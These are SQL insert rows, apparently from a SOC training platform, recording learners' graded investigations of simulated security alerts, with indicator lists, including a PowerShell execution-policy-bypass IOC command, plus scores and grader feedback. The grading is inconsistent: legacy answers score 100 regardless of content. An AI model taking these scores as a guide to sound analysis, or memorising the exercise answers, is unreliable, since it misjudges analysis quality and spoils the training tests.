(559, 232, 1369, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.5.23\",\"hash-e99a18c4\",\"artifact_3\"],\"selectedActions\":[\"reset_credentials\",\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 10:13:07 PM\\nALERT: Lateral Movement to Secure Network Segments [OP: Operation Dream Job]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.5.23\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T16:43:07.728Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-14 16:42:30', '2026-03-14 16:43:07', 0, NULL),
(560, 232, 1370, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-14 16:43:07', '2026-03-14 16:43:07', 0, NULL),
(561, 298, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-14 18:38:47', '2026-03-14 18:38:47', 0, NULL),
(562, 296, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-14 21:29:35', '2026-03-14 21:29:35', 0, NULL),
(563, 296, 704, 'investigating', NULL, NULL, NULL, NULL, '2026-03-15 00:38:13', '2026-03-14 21:30:13', '2026-03-14 21:30:13', 0, NULL),
(564, 296, 1466, 'graded', 84, 'Verdict is correct (+40). Missed critical artifacts: ip 203.0.113.45 (2/3). Missed response actions (4/5)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_4\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 9:33:46 PM\\nALERT: Initial Access via Spear Phishing [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [DOMAIN] update-portal.example.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T21:33:53.987Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: ip 203.0.113.45 (2/3). Missed response actions (4/5)\",\"missed_items\":[\"ip: 203.0.113.45\",\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', '2026-03-15 00:37:46', '2026-03-14 21:32:46', '2026-03-14 21:33:53', 0, NULL),
(565, 34, 237, 'investigating', NULL, NULL, NULL, NULL, '2026-03-15 01:41:24', '2026-03-14 22:35:24', '2026-03-14 22:35:24', 0, NULL),
(566, 300, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-14 23:29:22', '2026-03-14 23:29:22', 0, NULL),
(567, 300, 316, 'investigating', NULL, NULL, NULL, NULL, '2026-03-15 03:05:30', '2026-03-14 23:55:30', '2026-03-14 23:55:30', 0, NULL),
(568, 34, 920, 'investigating', NULL, NULL, NULL, NULL, '2026-03-15 05:47:48', '2026-03-15 02:37:48', '2026-03-15 02:37:48', 0, NULL),
(569, 225, 236, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"A high number of login attempts indicates that this is a brute force attack.\",\"artifacts\":\"192.0.2.45, 203.0.113.5, admin\",\"analysis_answers\":{\"action_taken\":\"A high number of login attempts indicates that this is a brute force attack.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-15T10:50:09.550Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-15 13:46:09', '2026-03-15 10:41:09', '2026-03-15 10:51:00', 0, NULL),
(570, 225, 735, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.23\",\"ip-192.168.10.5\",\"domain-http://login\",\"artifact_1\"],\"selectedActions\":[\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 9:53:26 PM\\nALERT: Spear Phishing Email Detected with Malicious URL\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 198.51.100.23\\n- [IP] 192.168.10.5\\n- [DOMAIN] http://login.examp1e.com/secure\\n- [EMAIL] ceo@examp1e.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T10:53:32.339Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"block_url\",\"close_alert\"],\"strengths\":\"Solid analysis\"}', '2026-03-15 13:58:09', '2026-03-15 10:52:09', '2026-03-15 10:53:32', 0, NULL),
(571, 225, 242, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"Parent process, explorer.exe, ran powershell.exe, which is suspicious. A command was injected stealthily using -NoP -NonI -W Hidden. A registry was modified and this indicates an attacker is trying to execute malicious code.\",\"artifacts\":\"192.168.1.10, 2B2B6D120897FBB5783C3F8DCF57DBBA, calc.exe, DESKTOP-7GTHB9K, jdoe,\",\"analysis_answers\":{\"action_taken\":\"Parent process, explorer.exe, ran powershell.exe, which is suspicious. A command was injected stealthily using -NoP -NonI -W Hidden. A registry was modified and this indicates an attacker is trying to execute malicious code.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-16T02:58:46.091Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-15 14:02:30', '2026-03-15 10:54:30', '2026-03-16 02:59:00', 0, NULL),
(572, 297, 944, 'graded', 70, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.2.12\",\"ip-203.0.113.55\",\"domain-http://phish\",\"domain-companyx.com\",\"artifact_1\"],\"selectedActions\":[\"block_ip\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 6:47:10 PM\\nALERT: QR Code Phishing Attack\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.55\\n- [IP] 192.168.2.12\\n- [DOMAIN] http://phishing-site.com/qrcode\\n- [DOMAIN] companyx.com\\n- [EMAIL] it-support@companyx.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T11:47:14.948Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/3)\",\"missed_items\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-15 14:50:54', '2026-03-15 11:41:54', '2026-03-15 11:47:14', 0, NULL),
(573, 297, 852, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-195.154.200.25\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 6:50:38 PM\\nALERT: BEC Attempt Detected with CEO Impersonation\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 195.154.200.25\\n- [EMAIL] ceo@reta1lcorp.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T11:50:43.846Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-15 14:53:34', '2026-03-15 11:48:34', '2026-03-15 11:50:43', 0, NULL),
(574, 232, 248, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"False Positive\",\"executive_summary\":\"as from the scenario it may be possible that the cloud provider might be login from a different time zone or may be from different end point device, so the log was generated as low priority and there is not any brute force attack or impossible time travelling. \",\"artifacts\":\"{\\\"timestamp\\\":\\\"2023-10-05T11:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.120\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"n/a\\\",\\\"hostname\\\":\\\"SERVER-1\\\"}\",\"analysis_answers\":{\"action_taken\":\"as from the scenario it may be possible that the cloud provider might be login from a different time zone or may be from different end point device, so the log was generated as low priority and there is not any brute force attack or impossible time travelling. \",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-15T15:59:21.419Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-15 18:52:09', '2026-03-15 15:44:09', '2026-03-15 16:00:00', 0, NULL),
(575, 232, 244, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.15\",\"hash-3f5d2c7e\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 10:33:48 PM\\nALERT: Malware Detected on Endpoint via Suspicious Process Execution\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 10.0.0.15\\n- [HASH] 3f5d2c7e1d4b8f9a6a7f8b2d3a4c5d6e\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:03:51.364Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-15 19:07:29', '2026-03-15 16:00:29', '2026-03-15 17:03:51', 0, NULL),
(576, 232, 245, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"False Positive\",\"executive_summary\":\"The src_ip and dest_ip differ matters\",\"artifacts\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"DESKTOP-1\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\",\"analysis_answers\":{\"action_taken\":\"The src_ip and dest_ip differ matters\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-15T18:04:30.631Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-15 20:18:52', '2026-03-15 17:12:52', '2026-03-15 18:05:00', 0, NULL),
(577, 303, 268, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:18:43 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:49:09.880Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:13:19', '2026-03-15 17:49:09', 0, NULL),
(578, 303, 237, 'investigating', NULL, NULL, NULL, NULL, '2026-03-15 20:31:45', '2026-03-15 17:21:45', '2026-03-15 17:21:45', 0, NULL),
(579, 304, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-15 17:29:01', '2026-03-15 17:29:01', 0, NULL),
(580, 303, 269, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"collect_forensics\",\"isolate_host\",\"block_hash\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:20:56 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:51:04.251Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:49:09', '2026-03-15 17:51:04', 0, NULL),
(581, 303, 270, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:23:02 PM\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:53:04.701Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:51:04', '2026-03-15 17:53:04', 0, NULL),
(582, 303, 271, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:24:50 PM\\nALERT: Lateral Movement to OT Network [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 10.0.0.5\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [USERNAME] jdoe\\n- [IP] 203.0.113.55\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:54:52.168Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:53:04', '2026-03-15 17:54:52', 0, NULL),
(583, 303, 272, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:26:09 PM\\nALERT: SCADA System Compromise [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.20\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [IP] 203.0.113.45\\n- [FILENAME] malicious_script.sh\\n- [USERNAME] unauthorized_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:56:11.157Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:54:52', '2026-03-15 17:56:11', 0, NULL),
(584, 303, 274, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:27:41 PM\\nALERT: Phishing Attempt via Weaponized Job Offers [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [EMAIL] recruiter@example.com\\n- [FILENAME] JobOffer.docm\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:57:42.261Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:56:25', '2026-03-15 17:57:42', 0, NULL),
(585, 303, 275, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.5\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_1\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:28:56 PM\\nALERT: Malicious Code Execution on Developer Systems [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.5\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\\n- [USERNAME] dev_user01\\n- [FILENAME] malicious_script.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:58:57.599Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:57:42', '2026-03-15 17:58:57', 0, NULL),
(586, 303, 276, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-10.0.0.5\",\"ip-203.0.113.45\",\"hash-3f5d8f3e\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:29:56 PM\\nALERT: Establishing Persistence and Lateral Movement [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 10.0.0.5\\n- [IP] 203.0.113.45\\n- [HASH] 3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\\n- [USERNAME] jdoe\\n- [FILENAME] persistence_tool.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T17:59:57.689Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:58:57', '2026-03-15 17:59:57', 0, NULL),
(587, 303, 277, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"hash-e3b0c442\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/15/2026, 11:30:53 PM\\nALERT: Cryptocurrency Exfiltration and Laundering [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [EMAIL] attacker@malicious.com\\n- [FILENAME] exfil_transaction_details.csv\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T18:00:54.979Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 17:59:57', '2026-03-15 18:00:54', 0, NULL),
(588, 303, 278, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-15 18:01:05', '2026-03-15 18:01:05', 0, NULL),
